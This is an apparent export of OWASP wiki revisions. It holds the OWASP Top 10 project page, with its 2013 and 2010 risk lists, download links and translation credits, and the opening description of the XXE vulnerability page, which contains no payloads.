* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_External_Entity_(XXE)_Processing&amp;diff=234397</id>
		<title>XML External Entity (XXE) Processing</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_External_Entity_(XXE)_Processing&amp;diff=234397"/>
				<updated>2017-10-15T01:46:07Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: /* Disclosing /etc/passwd or other targeted files */  remove extra space&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Vulnerability}}&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
[[ASDR_TOC_Vulnerabilities|Vulnerabilities Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
An &amp;lt;i&amp;gt;XML External Entity&amp;lt;/i&amp;gt; attack is a type of attack against an application that parses XML input. This attack occurs when &amp;lt;b&amp;gt;XML input containing a reference to an external entity is processed by a weakly configured XML parser&amp;lt;/b&amp;gt;. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.&lt;br /&gt;
&lt;br /&gt;
The [http://www.w3.org/TR/REC-xml/ XML 1.0 standard] defines the structure of an XML document. The standard defines a concept called an entity, which is a storage unit of some type. There are a few different types of entities, [http://www.w3.org/TR/REC-xml/#sec-external-ent external general/parameter parsed entity] often shortened to '''external entity''', that can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI that can be dereferenced (accessed) by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information normally not accessible by the application. Similar attack vectors apply the usage of external DTDs, external stylesheets, external schemas, etc. which, when included, allow similar external resource inclusion style attacks.&lt;br /&gt;
&lt;br /&gt;
